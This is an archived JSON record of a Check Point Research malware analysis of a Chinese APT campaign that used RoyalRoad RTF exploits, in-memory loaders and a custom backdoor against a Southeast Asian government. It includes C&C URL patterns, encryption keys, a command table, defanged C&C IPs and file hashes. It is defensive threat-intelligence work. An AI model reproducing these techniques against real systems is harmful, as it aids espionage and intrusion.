{ "id": "c92f1a4a-44aa-4e68-934c-e2f78137ed1e", "created_at": "2026-04-07T14:44:09.285104Z", "updated_at": "2026-04-10T03:35:55.935142Z", "deleted_at": null, "sha1_hash": "f1cb527c7fa7997f0076e389562b17cd413e6a43", "title": "SharpPanda: Chinese APT Group Targets Southeast Asian Government With Previously Unknown Backdoor", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 124597, "plain_text": "SharpPanda: Chinese APT Group Targets Southeast Asian\r\nGovernment With Previously Unknown Backdoor\r\nBy michaelab\r\nPublished: 2021-06-03 · Archived: 2026-04-07 14:25:14 UTC\r\nIntroduction\r\nCheck Point Research identified an ongoing surveillance operation targeting a Southeast Asian government. The\r\nattackers use spear-phishing to gain initial access and leverage old Microsoft Office vulnerabilities together with\r\nthe chain of in-memory loaders to attempt and install a previously unknown backdoor on victim’s machines.\r\nOur investigation shows the operation was carried out by what we believe is a Chinese APT group that has been\r\ntesting and refining the tools in its arsenal for at least 3 years.\r\nWhile some initial artifacts of this attack have already been analyzed by VinCSS, in this report we will reveal the\r\nfull infection chain used in this attack and provide a full analysis of the TTPs used throughout this campaign as\r\nwell as the new tools uncovered during the research. We will also explore the evolution of the actor’s tools since\r\nthey have been first seen in the wild.\r\nInfection Chain\r\nThe investigation starts from the campaign of malicious DOCX documents that are sent to different employees of\r\na government entity in Southeast Asia. In some cases, the emails are spoofed to look like they were from other\r\ngovernment-related entities. The attachments to these emails are weaponized copies of legitimate looking official\r\ndocuments and use the remote template technique to pull the next stage from the attacker’s server.\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 1 of 16\n\nFigure 1: Examples of lure documents sent to the victims\r\nEach document downloads a template from a different URL but with a similar pattern, with the working folder\r\ncontaining names of brands ( ipad , surface , apple , etc.) to distinguish between each victim.\r\nFigure 2: External template URL\r\nThe remote templates in all the cases are RTF files weaponized using a variant of a tool named RoyalRoad. This\r\ntool allows the attacker to create customized documents with embedded objects that exploit the Equation Editor\r\nvulnerabilities of Microsoft Word. Despite the fact that these vulnerabilities are few years old, they are still used\r\nby multiple attack groups, and especially popular with Chinese APT groups.\r\nThe initial documents and RTF files are just the very start of an elaborate multi-stage infection-chain we will\r\nanalyze.\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 2 of 16\n\nFigure 3: Full infection chain\r\nRoyalRoad RTF\r\nAs all RoyalRoad RTFs, the next stage RTF document contains encrypted payload and shellcode.\r\nFigure 4: RTFobj output, exposing OLE objects information\r\nTo decrypt the payload from the package, the attacker uses the RC4 algorithm with the key 123456 , and the\r\nresulted DLL file is saved as 5.t in the %Temp% folder. The shellcode is also responsible for the persistence\r\nmechanism – it creates the scheduled task named Windows Update that should run the exported function StartW\r\nfrom 5.t with rundll32.exe , once a day.\r\nThe use of StartW as exported function, is common with Cobalt Strike DLL’s. The use of such an export name\r\nmight indicate that in other cases, the same toolset is used to deliver Cobalt Strike instead of the payloads we\r\ndescribe below.\r\n5.t Downloader\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 3 of 16\n\nThe 5.t DLL’s original name is Download.dll . It starts with a common anti-sandboxing technique detecting\r\nthe acceleration of code execution: it gets the local time before and after a Sleep function call and checks if the\r\nSleep was skipped.\r\nThen the loader gathers data on the victim’s computer including hostname, OS name and version, system type\r\n(32/64 bit), user name, MAC addresses of the networking adapters. It also queries WMI for the anti-virus\r\ninformation.\r\nThe loader then encrypts the information using the RC4 with the key 123456 and base64 encodes it.\r\nThe data is then sent via GET HTTP to:\r\nhttp://\u003cC\u0026C IP\u003e/\u003cworking_folder\u003e/Main.php?Data=\u003cencrypted_data\u003e with the User-Agent Microsoft\r\nInternet Explorer and then the loader gets the response from\r\nhttp://\u003cC\u0026C IP\u003e/\u003cworking_folder\u003e/buy/\u003chostname\u003e.html .\r\nIf the threat actor finds the victim machine interesting, the response from the server contains the next stage\r\nexecutable in encrypted form, in the same way the data is sent to the C\u0026C server.\r\nTo verify the integrity of the received message, the loader uses the FNV-1A64 hash algorithm to check if the\r\nprefix of the decrypted message is A257 , and also calculates the MD5 of the message to makes sure it’s the same\r\none as specified at the start of the message.\r\nFigure 5: Start of the decrypted response\r\nIn the end, the loader loads the decrypted DLL to memory, starts its execution from the StartW export function\r\nand notifies the server about the result of the operation.\r\nThe Loader\r\nTo ensure only one instance of the loader is running, the loader first creates an event named\r\n9DJ8;;L;'4299FDS12JS and proceeds with the execution if the event did not exist before.\r\nFor anti-analysis purposes, the loader functionality is implemented as a shellcode, which is stored encrypted inside\r\nthe binary. The loader decrypts the shellcode by XORing it with the 32 byte key:\r\n[0x8a, 0x4e, 0xd1, 0xbb, 0xc4, 0xcc, 0x75, 0x3a, 0x4b, 0x5f, 0xe1, 0x99, 0x3a, 0x4b, 0x5f, 0x61,\r\n0xd1, 0xbb, 0xc4, 0x50, 0xe4, 0x99, 0x3a, 0x4b, 0xe4, 0x99, 0xcc, 0x75, 0x3a, 0xe4, 0x90, 0x8a] ,  then\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 4 of 16\n\nloads the needed libraries and passes the execution to the shellcode itself.\r\nFigure 6: List of loaded libraries used for by shellcode to dynamically resolve API functions\r\nAnother anti-analysis technique observed being used by the shellcode inside the loader is dynamic API resolving\r\nusing the known hash method. This way, the loader is able to not only hide its main functionality but also avoid\r\nstatic detection of suspicious API calls by dynamically resolving them instead of using static imports.\r\nThe decrypted shellcode contains a configuration that is used to obtain and correctly run the next stage. It includes\r\nthe C\u0026C server IP and port, as well as some other values that we will discuss later.\r\nFigure 7: Malware configuration\r\nOnce initialized, the shellcode sends the CONNECT HTTP/1.1 message to the IP:port from the configuration and\r\nfollows up with another message containing the identifier (in our case admin )  XORed with a hardcoded 48-byte\r\nkey. The received message is decrypted in the same way and the shellcode checks if it starts with the magic\r\nnumber: 0x11d4 .  If the server returns valid data, the loader runs several checks on its PE headers, load the\r\nbackdoor to memory and executes an exported function named MainThread .\r\nThe loader DLL also contains a PE executable in a resource named TXT .  The executable is named SurvExe\r\nbased on the PDB path left by the attacker:\r\nC:\\Users\\user\\Desktop\\0814-surexe\\x64\\SurvExe\\x64\\Release\\SurvExe.pdb .\r\nThis executable is supposed to be responsible for copying the file passed to it as a parameter to the TEMP\r\ndirectory with the name OEJFISDOFJDLK . However, the resource is not used and seems to have been left by the\r\nattacker from previous malware versions.\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 5 of 16\n\nThe Backdoor\r\nAs we discussed before, at the final stage of the infection chain the malicious loader is supposed to download,\r\ndecrypt and load a DLL file into memory. In theory, this plug-in architecture might be used to download and\r\ninstall any other module in addition to the backdoor we received.\r\nThe backdoor module appears to be a custom and unique malware with the internal name VictoryDll_x86.dll .\r\nThe backdoor capabilities include the ability to:\r\nDelete/Create/Rename/Read/Write Files and get files attributes\r\nGet processes and services information\r\nGet screenshots\r\nPipe Read/Write – run commands through cmd.exe\r\nCreate/Terminate Process\r\nGet TCP/UDP tables\r\nGet CDROM drives data\r\nGet registry keys info\r\nGet titles of all top-level windows\r\nGet victim’s computer information – computer name, user name, gateway address, adapter data, Windows\r\nversion (major/minor version and build number) and type of user\r\nShutdown PC\r\nC\u0026C Communication\r\nFor the C\u0026C communication, the backdoor uses the same configuration as the one from the previous step, which\r\ncontains server IP and port.\r\nFirst, it sends to the server “Start conversation” ( 0x540 ) message XORed with hard-coded 256-byte key.\r\nFigure 8: “Start conversation” request sent by the backdoor\r\nThe server, in turn, returns the “Get Victim Information” ( 0x541 ) message and the new 256-byte key that will be\r\nused for all the subsequent communication. \r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 6 of 16\n\nFigure 9: Response from C\u0026C server\r\nAll the subsequent communication with the C\u0026C server has the following format:\r\n[ Size ] followed by XORed [ TypeID ] and [ Data ] (with 256-byte key).\r\nThe full list of commands and different types of messages between the C\u0026C and the backdoor is provided in\r\nAppendix A.\r\nSome History\r\nSearching for files similar to the final backdoor in the wild, we encountered a set of files that were submitted to\r\nVirusTotal in 2018. The files were named by the author as MClient and appear to be part of a project internally\r\ncalled SharpM , according to their PDB paths. Compilation timestamps also show a similar timeframe between\r\nJuly 2017 and June 2018, and upon examination of the files, they were found to be older test versions of our\r\nVictoryDll backdoor and its loaders chain.\r\nThe numerous similarities include:\r\nThe specific implementation of the main backdoor functionality is identical;\r\nThe SurvExe resource in the loader is very similar to one of the MClient ’s methods using the same\r\nevent name pattern. Also, SurvExe seems to have inherited the masquerading technique from MClient –\r\nboth were internally named svchost.exe .\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 7 of 16\n\nFigure 10: SurvExe module code compared to MClient’s code (right)\r\nThe connection method has the same format. Moreover, MClient ’s connection XOR key and\r\nVictoryDll ‘s initial XOR key are the same (in fact, VictoryDll ‘s XOR key is the expansion of this key\r\nto 256 bytes):\r\nFigure 11: MClient’s XOR key compared to VictoryDLL’s XOR key (right)\r\nMClient contained an additional DLL called AutoStartup_DLL , whose purpose was to create the\r\nscheduled task called Windows Update – a functionality which in our campaign was delegated to the RTF\r\nexploit.\r\nSame but Different\r\nThe backdoor has also undergone some changes in the architecture, functionality and naming:\r\nDifferent export function names: in our backdoor, the exported function is named MainThread while in all\r\nversions of the MClient variant the export function was named GetCPUID .\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 8 of 16\n\nSame configuration fields, but the different obfuscation used. In the later version, the configuration is a part\r\nof the encrypted shellcode inside the loader, whereas in MClient the configuration is hardcoded in the\r\nbackdoor XORed with the byte 0x56 or, in some test versions, not obfuscated at all.\r\nMClient has an addition al persistence mechanism besides the scheduled task the VictoryDll has in\r\nits infection chain: in case of low privileges, on Windows 10, or having Kaspersky installed on the victim’s\r\ncomputer, MClient adds itself to SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry with the\r\nname Intel USB3 Driver .\r\nMClient versions from 2018 contain the code that bypasses UAC using wusa.exe. In VictoryDll this\r\nfunction doesn’t exist anymore; instead of that, the code only tries to get the user’s privileges by attempting\r\nto open the file C:\\Windows\\l and checking the result of this operation.\r\nThe MClient version from January 2018 ( aa5458bdfefe2a97611bb0fd9cf155a06f88ef5d ) also contained\r\na keylogger functionality which has since been removed in the subsequent test versions and not present in\r\nVictoryDll .\r\nOverall, we can see that in these 3 years, most of the functionality of MClient and AutoStartup_DLL was\r\npreserved and split between multiple components – probably to complicate the analysis and decrease the detection\r\nrates at each stage. We may also assume that there exist other modules based on the code from 2018 that might be\r\ninstalled by the attacker in the later stages of the attack.\r\nInfrastructure\r\nFirst stage C\u0026C servers are hosted by 2 different cloud services, located in Asia (Hong Kong and Malaysia). The\r\nbackdoor C\u0026C server, 107.148.165[.]151 , is hosted on Zenlayer, a US-based provider which is widely used for\r\nC\u0026C purposes by multiple threat actors.\r\nThe threat actor operates the C\u0026C servers in a limited daily window, making it harder to gain access to the\r\nadvanced parts of the infection chain. Specifically, it returned the next stage payloads only during 01:00 – 08:00\r\nUTC on workdays.\r\nAt some point in the research, one of the attacker’s servers that served the loader component had directory listing\r\nenabled for a limited time. In addition to that, the Main.php file was served without processing and revealed a\r\npiece of PHP code whose purpose was to log all the incoming requests with the date, IP address and decrypted\r\ndata to log.txt\r\nFigure 12: File listing on the server\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 9 of 16\n\nFigure 13: Fragment of the simple PHP code that logs the requests, found on the server\r\nAttribution\r\nWe attribute this cluster of activity to a Chinese threat group with medium to high confidence, based on the\r\nfollowing artifacts and indicators:\r\nThe RoyalRoad RTF exploit building kit mentioned above, has been reported by numerous researchers as a\r\ntool of choice among Chinese APT groups.\r\nThe C\u0026C servers returned payloads only between 01:00 – 08:00 UTC, which we believe are the working\r\nhours in the attackers’ country, therefore the range of possible origins of this attack is limited.\r\nThe C\u0026C servers did not return any payload (even during working hours), specifically the period between\r\nMay 1st and 5th – this was when the Labor Day holidays in China took place.\r\nSome test versions of the backdoor contained internet connectivity check with www.baidu.com – a leading\r\nChinese website.\r\nSome test versions of the backdoor from 2018 were uploaded to VirusTotal from China.\r\nFigure 14: Submissions for test backdoors (f8088c15f9ea2a1e167d5fa24b65ec356939ba91 and\r\n7a38ae6df845def6f28a4826290f1726772b247e)\r\nWhile we could identify overlaps in TTPs with multiple Chinese APT groups, we have been unable to attribute\r\nthis set of activities to any known group.\r\nConclusion\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 10 of 16\n\nWe unveiled the latest activity of what seems to be a long-running Chinese operation that managed to stay under\r\nthe radar for more than 3 years. In this campaign, the attackers utilized the set of Microsoft Office exploits and\r\nloaders with anti-analysis and anti-debugging techniques to install a previously unknown backdoor.\r\nAnalyzing the backdoor’s code evolution since its first appearance in the wild showed how it transformed from a\r\nsingle executable to a multi-stage attack, making it harder to detect and investigate.\r\nCheck Point Threat Emulation blocks this attack from the very first step.\r\nAppendix A: Backdoor Commands\r\nMessage Type Type ID Arguments Source\r\nSend victim’s information 0x2 Info Victim\r\nCDROM drives data 0x4 – / Drives data Both\r\nGet Files data 0x5/0x6 Path / Files data Both\r\nCreate Process 0x7 Command Line\r\nC\u0026C\r\nserver\r\nRename File 0x8 Old filename, New filename\r\nC\u0026C\r\nserver\r\nDelete File 0x9 Filename\r\nC\u0026C\r\nserver\r\nRead File 0xa\r\nFilename, Offset / File’s\r\ncontent\r\nBoth\r\nExit Pipe 0xb –\r\nC\u0026C\r\nserver\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 11 of 16\n\nCreate Pipe 0xc –\r\nC\u0026C\r\nserver\r\nWrite To Pipe 0xd Buffer\r\nC\u0026C\r\nserver\r\nGet Uninstalled software data 0xe – / Software data Both\r\nGet windows text 0xf – / Windows text Both\r\nGet active processes data 0x10 – / Processes data Both\r\nTerminate Process 0x11 Process ID\r\nC\u0026C\r\nserver\r\nGet screenshot 0x12/0x13 – / Screenshot temp file Both\r\nGet services data 0x14 – / Services data Both\r\nGet TCP/UDP tables 0x15 – / Tables data Both\r\nGet registry key data 0x16 Registry path / Reg data Both\r\nShutdown 0x17 –\r\nC\u0026C\r\nserver\r\nExit process 0x18 –\r\nC\u0026C\r\nserver\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 12 of 16\n\nRestart current process 0x19 –\r\nC\u0026C\r\nserver\r\nWrite to file 0x4C7 Filename, Buffer\r\nC\u0026C\r\nserver\r\nStart Connection 0x540 Zero Byte Victim\r\nGet victim’s information/Update XOR\r\nkey\r\n0x541 New XOR key / Victim’s info Both\r\nNone 0x120E –\r\nC\u0026C\r\nserver\r\nAck 0x129D3 Name (‘admin’ in our case) Victim\r\nAppendix B: Indicators of Compromise\r\nDocuments\r\n278c4fc89f8e921bc6c7d015e3445a1cc6319a66\r\n42be0232970d5274c5278de77d172b7594ff6755\r\nf9d958c537b097d45b4fca83048567a52bb597bf\r\nfefec06620f2ef48f24b2106a246813c1b5258f4\r\n548bbf4b79eb5a173741e43aa4ba17b92be8ed3a\r\n417e4274771a9614d49493157761c12e54060588\r\nExecutables\r\n03a57262a2f3563cf0faef5cde5656da437d58ce 5.t\r\n388b7130700dcc45a052b8cd447d1eb76c9c2c54 5.t\r\n176a0468dd70abe199483f1af287e5c5e2179b8c 5.t\r\n01e1913b1471e7a1d332bfc8b1e54b88350cb8ad loader\r\n8bad3d47b2fc53dc6f9e48debac9533937c32609 ServExe (x64)\r\n0a588f02e60de547969d000968a458dcdc341312 VictoryDll\r\nC\u0026C servers\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 13 of 16\n\n45.91.225[.]139\r\n107.148.165[.]151\r\n45.121.146[.]88\r\nOld backdoor versions\r\nMClient:\r\naa5458bdfefe2a97611bb0fd9cf155a06f88ef5d\r\n4da26e656ef5554fac83d1e02105fad0d1bd7979\r\nf8088c15f9ea2a1e167d5fa24b65ec356939ba91\r\n0726e56885478357de3dce13efff40bfba53ddc2\r\n7855a30e933e2b5c3db3661075c065af2e40b94e\r\n696a4df81337e7ecd0ea01ae92d8af3d13855c12\r\nabaaab07985add1771da0c086553fef3974cf742\r\n7a38ae6df845def6f28a4826290f1726772b247e\r\nAutostart_DLL:\r\ne16b08947cc772edf36d97403276b14a5ac966d0\r\nc81ba6c37bc5c9b2cacf0dc53b3105329e6c2ecc\r\na96dfbad7d02b7c0e4a0244df30e11f6f6370dde\r\n6f5315f9dd0db860c18018a961f7929bec642918\r\nAppendix C: MITRE ATT\u0026CK Matrix\r\nTactic Technique Technique Name\r\nInitial Access T1566.001 Phishing: Spearphishing Attachment\r\nExecution\r\nT1204.002 User Execution: Malicious File\r\nT1203 Exploitation for Client Execution \r\nT1059.003\r\nExecution Command and Scripting Interpreter: Windows Command\r\nShell\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 14 of 16\n\nPersistence T1053 Scheduled Task/Job\r\nDefense Evasion\r\nT1027 Obfuscated Files or Information\r\nT1221 Template Injection\r\nDiscovery\r\nT1082 System Information Discovery\r\nT1518 Software Discovery\r\nT1057 Process Discovery\r\nT1012 Query Registry\r\nT1007 System Service discovery\r\nT1081 File and Directory Discovery\r\nT1010 Application Window Discovery\r\nCollection\r\nT1113 Screen Capture\r\nT1005 Data from Local System\r\nCommand and\r\nControl\r\nT1132 Data Encoding\r\nT1104 Multi-Stage Channels\r\nT1071.001 Application Layer Protocol: Web Protocols\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 15 of 16\n\nT1573.001 Encrypted Channel: Symmetric Cryptography\r\nExfiltration T1041 Exfiltration Over C2 Channel\r\nImpact T1529 System Shutdown/Reboot\r\nSource: https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nhttps://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/\r\nPage 16 of 16\n\n https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/ \n T1573.001 Encrypted Channel: Symmetric Cryptography\nExfiltration T1041 Exfiltration Over C2 Channel\nImpact T1529 System Shutdown/Reboot \nSource: https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/ \n Page 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MISPGALAXY" ], "references": [ "https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/" ], "report_names": [ "chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "8a3bd03a-f69b-455b-b88b-3842a3528bfd", "created_at": "2022-10-25T16:07:24.178007Z", "updated_at": "2026-04-10T02:00:04.89066Z", "deleted_at": null, "main_name": "SharpPanda", "aliases": [ "Sharp Dragon", "SharpPanda" ], "source_name": "ETDA:SharpPanda", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "Agentemis", "Cobalt Strike", "CobaltStrike", "RoyalRoad", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "e7ef34b6-e7b6-46f3-8dd8-2708c1659cd6", "created_at": "2023-11-08T02:00:07.107758Z", "updated_at": "2026-04-10T02:00:03.415268Z", "deleted_at": null, "main_name": "SharpPanda", "aliases": [ "Sharp Dragon" ], "source_name": "MISPGALAXY:SharpPanda", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775573049, "ts_updated_at": 1775792155, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f1cb527c7fa7997f0076e389562b17cd413e6a43.pdf", "text": "https://archive.orkl.eu/f1cb527c7fa7997f0076e389562b17cd413e6a43.txt", "img": "https://archive.orkl.eu/f1cb527c7fa7997f0076e389562b17cd413e6a43.jpg" } }